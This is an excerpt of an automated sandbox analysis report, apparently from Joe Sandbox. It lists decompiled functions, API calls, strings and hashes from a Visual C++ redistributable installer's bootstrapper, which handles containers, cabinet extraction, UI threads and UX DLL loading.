                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B42D5
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B42E9
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,000B515E,?,?,00000000,?,?), ref: 000B42F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                          • String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3039292287-3209860532
                                                                          • Opcode ID: 7b6c39894c2b8be3d5bfe1eee88fac9d0ba64f5ae1526379a96fff8094fedbce
                                                                          • Instruction ID: c79efd5d80b72f77b1d3decae2334a1274955f99a4029612b6d2a55d7a88f5cf
                                                                          • Opcode Fuzzy Hash: 7b6c39894c2b8be3d5bfe1eee88fac9d0ba64f5ae1526379a96fff8094fedbce
                                                                          • Instruction Fuzzy Hash: 5A51A571A40219BFD7249B69DC46FFE77A8FB04B60F040115F718DB291DB70AA50DBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 54%
                                                                          			E000BC129(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
                                                                          				void* _t29;
                                                                          				int _t31;
                                                                          				union _LARGE_INTEGER* _t33;
                                                                          				int _t34;
                                                                          				long _t38;
                                                                          				signed short _t40;
                                                                          				signed short _t43;
                                                                          				void* _t47;
                                                                          				signed short _t48;
                                                                          				HANDLE* _t51;
                                                                          				intOrPtr _t52;
                                                                          				long _t55;
                                                                          				union _LARGE_INTEGER _t65;
                                                                          
                                                                          				_t52 = _a8;
                                                                          				_t51 = _a4;
                                                                          				_t51[6] =  *(_t52 + 4);
                                                                          				_t55 = 0;
                                                                          				_t65 = 0;
                                                                          				_t51[4] =  *(_t52 + 0x18);
                                                                          				_t51[5] =  *(_t52 + 0x1c);
                                                                          				_t51[2] =  *(_t52 + 0x40);
                                                                          				_t51[3] =  *(_t52 + 0x44);
                                                                          				if(_a12 != 0xffffffff) {
                                                                          					_t29 = GetCurrentProcess();
                                                                          					_t31 = DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2); // executed
                                                                          					if(_t31 != 0) {
                                                                          						_t65 = 0;
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t43 = GetLastError();
                                                                          						_t61 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          						_t55 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "container.cpp", 0xec, _t55);
                                                                          						_push(_a16);
                                                                          						_push("Failed to duplicate handle to container: %ls");
                                                                          						goto L3;
                                                                          					}
                                                                          				} else {
                                                                          					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                          					 *_t51 = _t47;
                                                                          					if(_t47 != 0xffffffff) {
                                                                          						L7:
                                                                          						if( *((intOrPtr*)(_a8 + 0xc)) == _t55) {
                                                                          							_t33 = _t55;
                                                                          						} else {
                                                                          							_t65 = _t51[2];
                                                                          							_t33 = _t51[3];
                                                                          						}
                                                                          						_push(_t55);
                                                                          						_t34 = SetFilePointerEx( *_t51, _t65, _t33, _t55); // executed
                                                                          						if(_t34 != 0) {
                                                                          							if(_t51[6] == 1) {
                                                                          								_t38 = E000D1484(_t51, _a16); // executed
                                                                          								_t55 = _t38;
                                                                          								if(_t55 < 0) {
                                                                          									_push("Failed to open container.");
                                                                          									goto L15;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t40 = GetLastError();
                                                                          							_t58 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							_t55 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "container.cpp", 0xf8, _t55);
                                                                          							_push("Failed to move file pointer to container offset.");
                                                                          							L15:
                                                                          							_push(_t55);
                                                                          							E000F012F();
                                                                          						}
                                                                          					} else {
                                                                          						_t48 = GetLastError();
                                                                          						_t64 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						_t55 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "container.cpp", 0xe6, _t55);
                                                                          						_push(_a16);
                                                                          						_push("Failed to open file: %ls");
                                                                          						L3:
                                                                          						_push(_t55);
                                                                          						E000F012F();
                                                                          					}
                                                                          				}
                                                                          				return _t55;
                                                                          			}

















                                                                          APIs
                                                                          • CreateFileW.KERNEL32(000DAB22,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,?,?,000DAB22), ref: 000BC170
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC181
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,?,?,000DAB22), ref: 000BC1D0
                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,000DAB22), ref: 000BC1D6
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,000DAB22), ref: 000BC1D9
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC1E3
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000DAB22), ref: 000BC235
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC23F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                          • String ID: @Met$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
                                                                          • API String ID: 2619879409-1851430804
                                                                          • Opcode ID: cfdfc7e650af232ca62602047b803a9b54aaba33219f48e937fb1f98e066ed79
                                                                          • Instruction ID: a8e97f2f98397e0ec9292235ab1f6f94ecaefc4fd86b5d48ca886c8725dbfb2f
                                                                          • Opcode Fuzzy Hash: cfdfc7e650af232ca62602047b803a9b54aaba33219f48e937fb1f98e066ed79
                                                                          • Instruction Fuzzy Hash: B6418372240305ABEB209F69DC45EA73BE9EF85750F114129FE18EB292DA71D811DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E000D1484(void* _a4, intOrPtr _a8) {
                                                                          				void* _t11;
                                                                          				void* _t12;
                                                                          				void* _t13;
                                                                          				void* _t29;
                                                                          				void* _t30;
                                                                          
                                                                          				_t29 = _a4;
                                                                          				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
                                                                          				_t5 = _t29 + 0x1c; // 0x1c
                                                                          				_t30 = E000B21A5(_t5, _a8, 0);
                                                                          				if(_t30 >= 0) {
                                                                          					_t11 = CreateEventW(0, 1, 0, 0);
                                                                          					 *(_t29 + 0x24) = _t11;
                                                                          					if(_t11 != 0) {
                                                                          						_t12 = CreateEventW(0, 1, 0, 0);
                                                                          						 *(_t29 + 0x28) = _t12;
                                                                          						if(_t12 != 0) {
                                                                          							_t13 = CreateThread(0, 0, E000D0E43, _t29, 0, 0); // executed
                                                                          							 *(_t29 + 0x20) = _t13;
                                                                          							if(_t13 != 0) {
                                                                          								_t30 = E000D1224(_t29);
                                                                          								if(_t30 < 0) {
                                                                          									_push("Failed to wait for operation complete.");
                                                                          									goto L10;
                                                                          								}
                                                                          							} else {
                                                                          								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                          								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                          								E000B37D3(0x80004005, "cabextract.cpp", 0x93, _t30);
                                                                          								_push("Failed to create extraction thread.");
                                                                          								goto L10;
                                                                          							}
                                                                          						} else {
                                                                          							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "cabextract.cpp", 0x8f, _t30);
                                                                          							_push("Failed to create operation complete event.");
                                                                          							goto L10;
                                                                          						}
                                                                          					} else {
                                                                          						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x8c, _t30);
                                                                          						_push("Failed to create begin operation event.");
                                                                          						goto L10;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to copy file name.");
                                                                          					L10:
                                                                          					_push(_t30);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _t30;
                                                                          			}









                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0000001C,?,00000000,00000000,00000000,00000000,?,000BC285,00000000,000DAB22,?,000DAB22), ref: 000D14BB
                                                                          • GetLastError.KERNEL32(?,000BC285,00000000,000DAB22,?,000DAB22), ref: 000D14C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorEventLast
                                                                          • String ID: @Met$Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
                                                                          • API String ID: 545576003-1997294977
                                                                          • Opcode ID: 2b2e5d3d2232d523035a1af6a2f1e91ca30a0d3020a18bf17d37ca16c6b6d044
                                                                          • Instruction ID: 8ffa0c3d617dd0a6cc687c3d72ad4aaec331fd3827b8f4420941f51d213118da
                                                                          • Opcode Fuzzy Hash: 2b2e5d3d2232d523035a1af6a2f1e91ca30a0d3020a18bf17d37ca16c6b6d044
                                                                          • Instruction Fuzzy Hash: 9721E3B2A40B25BAF7216679AC41FF775DCEF447A0B014223BD05E7681EB99DC0089F6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E000D0627(void* __ecx, CHAR* _a4) {
                                                                          				void* _v8;
                                                                          				long _t18;
                                                                          				void* _t19;
                                                                          				signed short _t22;
                                                                          				void* _t27;
                                                                          				int _t29;
                                                                          				signed short _t33;
                                                                          				signed int _t36;
                                                                          				int _t37;
                                                                          				signed int _t40;
                                                                          				void** _t44;
                                                                          				void* _t47;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t40 =  *0x11aac0; // 0x0
                                                                          				_push(_t36);
                                                                          				_t37 = _t36 | 0xffffffff;
                                                                          				_t47 = 0;
                                                                          				_v8 = _t37;
                                                                          				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
                                                                          				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37); // executed
                                                                          				if(_t18 != 2) {
                                                                          					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                          					_v8 = _t19;
                                                                          					if(_t19 == _t37) {
                                                                          						_t22 = GetLastError();
                                                                          						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          						_t47 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x2d5, _t47);
                                                                          						E000F012F(_t47, "Failed to open cabinet file: %hs", _a4);
                                                                          					}
                                                                          					L8:
                                                                          					_t44[0xc] = _t47;
                                                                          					_t21 =  <  ? _t37 : _v8;
                                                                          					return  <  ? _t37 : _v8;
                                                                          				}
                                                                          				_t27 = GetCurrentProcess();
                                                                          				_t29 = DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18); // executed
                                                                          				if(_t29 != 0) {
                                                                          					_t47 = E000D04BE(_t40,  &(_t44[7]), _v8, _t44[2], _t44[3]);
                                                                          					if(_t47 >= 0) {
                                                                          						goto L8;
                                                                          					}
                                                                          					_push("Failed to add virtual file pointer for cab container.");
                                                                          					L3:
                                                                          					_push(_t47);
                                                                          					E000F012F();
                                                                          					goto L8;
                                                                          				}
                                                                          				_t33 = GetLastError();
                                                                          				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                          				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                          				E000B37D3(0x80004005, "cabextract.cpp", 0x2ca, _t47);
                                                                          				_push("Failed to duplicate handle to cab container.");
                                                                          				goto L3;
                                                                          			}
















                                                                          APIs
                                                                          • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 000D0657
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 000D066F
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 000D0674
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 000D0677
                                                                          • GetLastError.KERNEL32(?,?), ref: 000D0681
                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000D06F0
                                                                          • GetLastError.KERNEL32(?,?), ref: 000D06FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                          • String ID: <the>.cab$@Met$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                          • API String ID: 3030546534-1066054086
                                                                          • Opcode ID: d8245549e864ed012abe5840dbd8bb57ae7da5223a5de489439613a5407b685f
                                                                          • Instruction ID: 7ff3aa09c850844319b9aa0c0ac7c9c93fb05cb94e16daa09ed3672ed5d22cce
                                                                          • Opcode Fuzzy Hash: d8245549e864ed012abe5840dbd8bb57ae7da5223a5de489439613a5407b685f
                                                                          • Instruction Fuzzy Hash: 10312672A41324BBEB209B69CC48FAB7EACFF04760F100126FD08E7690C7619D10DAE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E000CE82A(intOrPtr _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				void* _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				void _v24;
                                                                          				void* _t21;
                                                                          				void* _t24;
                                                                          				void* _t28;
                                                                          				intOrPtr _t43;
                                                                          				int _t45;
                                                                          
                                                                          				_v12 = 0;
                                                                          				asm("stosd");
                                                                          				_t45 = 0;
                                                                          				asm("stosd");
                                                                          				_v8 = 0;
                                                                          				asm("stosd");
                                                                          				_t21 = CreateEventW(0, 1, 0, 0);
                                                                          				_v12 = _t21;
                                                                          				if(_t21 != 0) {
                                                                          					_t43 = _a8;
                                                                          					_v24 = _t21;
                                                                          					_v20 = _a4;
                                                                          					_v16 = _t43;
                                                                          					_t24 = CreateThread(0, 0, E000CE563,  &_v24, 0, 0); // executed
                                                                          					_v8 = _t24;
                                                                          					if(_t24 != 0) {
                                                                          						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
                                                                          						 *((intOrPtr*)(_t43 + 0x3e4)) = _v8;
                                                                          						_t28 = 0;
                                                                          						_v8 = 0;
                                                                          					} else {
                                                                          						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "uithread.cpp", 0x3c, _t45);
                                                                          						_push("Failed to create the UI thread.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "uithread.cpp", 0x33, _t45);
                                                                          					_push("Failed to create initialization event.");
                                                                          					L2:
                                                                          					_push(_t45);
                                                                          					E000F012F();
                                                                          					_t28 = _v8;
                                                                          				}
                                                                          				if(_t28 != 0) {
                                                                          					CloseHandle(_t28);
                                                                          					_v8 = 0;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					FindCloseChangeNotification(_v12); // executed
                                                                          				}
                                                                          				return _t45;
                                                                          			}

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,000B5386,?,?), ref: 000CE84A
                                                                          • GetLastError.KERNEL32(?,000B5386,?,?), ref: 000CE857
                                                                          • CreateThread.KERNELBASE ref: 000CE8B0
                                                                          • GetLastError.KERNEL32(?,000B5386,?,?), ref: 000CE8BD
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,000B5386,?,?), ref: 000CE8F8
                                                                          • CloseHandle.KERNEL32(00000000,?,000B5386,?,?), ref: 000CE917
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000B5386,?,?), ref: 000CE924
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorLast$ChangeEventFindHandleMultipleNotificationObjectsThreadWait
                                                                          • String ID: @Met$Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                          • API String ID: 1372344712-3967303901
                                                                          • Opcode ID: bb6bae5cf00153a0a38f74828fd034db657de2d5a5d99972ce1965e8329664d0
                                                                          • Instruction ID: 4f0d2aec6757a03aaa485e46a3d15af101b19966bf3bedfc0c52f865a3c37d60
                                                                          • Opcode Fuzzy Hash: bb6bae5cf00153a0a38f74828fd034db657de2d5a5d99972ce1965e8329664d0
                                                                          • Instruction Fuzzy Hash: DD316675E40219BFFB509FA9DD84AAFB6ECEF08350F11412AF905F3191D7709E009AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E000D1224(intOrPtr _a4) {
                                                                          				long _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				long _t20;
                                                                          				int _t28;
                                                                          				intOrPtr _t50;
                                                                          
                                                                          				_t50 = _a4;
                                                                          				_v16 =  *(_t50 + 0x28);
                                                                          				_v12 =  *(_t50 + 0x20);
                                                                          				_v8 = 0;
                                                                          				_t20 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
                                                                          				if(_t20 == 0) {
                                                                          					if(ResetEvent( *(_t50 + 0x28)) != 0) {
                                                                          						 *((intOrPtr*)(_t50 + 0x2c)) = 0;
                                                                          					} else {
                                                                          						_t37 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x13e, _t38);
                                                                          						_push("Failed to reset operation complete event.");
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					if(_t20 == 1) {
                                                                          						_t28 = GetExitCodeThread( *(_t50 + 0x20),  &_v8); // executed
                                                                          						if(_t28 == 0) {
                                                                          							_t43 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							_t44 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "cabextract.cpp", 0x145, _t44);
                                                                          							_push("Failed to get extraction thread exit code.");
                                                                          							goto L7;
                                                                          						}
                                                                          					} else {
                                                                          						_t47 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x14b, _t48);
                                                                          						_push("Failed to wait for operation complete event.");
                                                                          						L7:
                                                                          						_push(_v8);
                                                                          						E000F012F();
                                                                          					}
                                                                          				}
                                                                          				return _v8;
                                                                          			}

                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,00000000,746AF5E0,?,00000000,?,?,?,00000000), ref: 000D1249
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D125C
                                                                          • GetExitCodeThread.KERNELBASE(?,?,?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?), ref: 000D129E
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D12AC
                                                                          • ResetEvent.KERNEL32(?,?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?), ref: 000D12E7
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D12F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                          • String ID: @Met$Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                          • API String ID: 2979751695-2925335154
                                                                          • Opcode ID: 68053697c2cddaeccdad973f86f75c57045934bcb46ecfcf90e695509759c20c
                                                                          • Instruction ID: 1fd23945b7c13eafbc48de55c5dd481c49503ac4ca72be627332f6971895e44a
                                                                          • Opcode Fuzzy Hash: 68053697c2cddaeccdad973f86f75c57045934bcb46ecfcf90e695509759c20c
                                                                          • Instruction Fuzzy Hash: 4C218FB1740304BFFB149B69CD45ABE76E8AF04710F50412FB986D66E0EB75DA00AA25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 18%
                                                                          			E000BD5C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				struct HINSTANCE__* _t9;
                                                                          				signed short _t15;
                                                                          				signed short _t18;
                                                                          				intOrPtr* _t21;
                                                                          				intOrPtr _t24;
                                                                          				void* _t25;
                                                                          
                                                                          				_t24 = _a4;
                                                                          				_t2 = _t24 + 4; // 0x69006e
                                                                          				_t9 = LoadLibraryW( *( *_t2 + 0x50)); // executed
                                                                          				 *(_t24 + 0xc) = _t9;
                                                                          				if(_t9 != 0) {
                                                                          					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
                                                                          					if(_t21 != 0) {
                                                                          						_t5 = _t24 + 0x10; // 0xfb4a0
                                                                          						_t25 =  *_t21(_a8, _a12, _t5);
                                                                          						if(_t25 < 0) {
                                                                          							_push("Failed to create UX.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_t15 = GetLastError();
                                                                          						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "userexperience.cpp", 0x5d, _t25);
                                                                          						_push("Failed to get BootstrapperApplicationCreate entry-point");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					_t18 = GetLastError();
                                                                          					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "userexperience.cpp", 0x59, _t25);
                                                                          					_push("Failed to load UX DLL.");
                                                                          					L6:
                                                                          					_push(_t25);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _t25;
                                                                          			}










                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(?,00000000,?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD5CD
                                                                          • GetLastError.KERNEL32(?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD5DA
                                                                          • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 000BD612
                                                                          • GetLastError.KERNEL32(?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD61E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
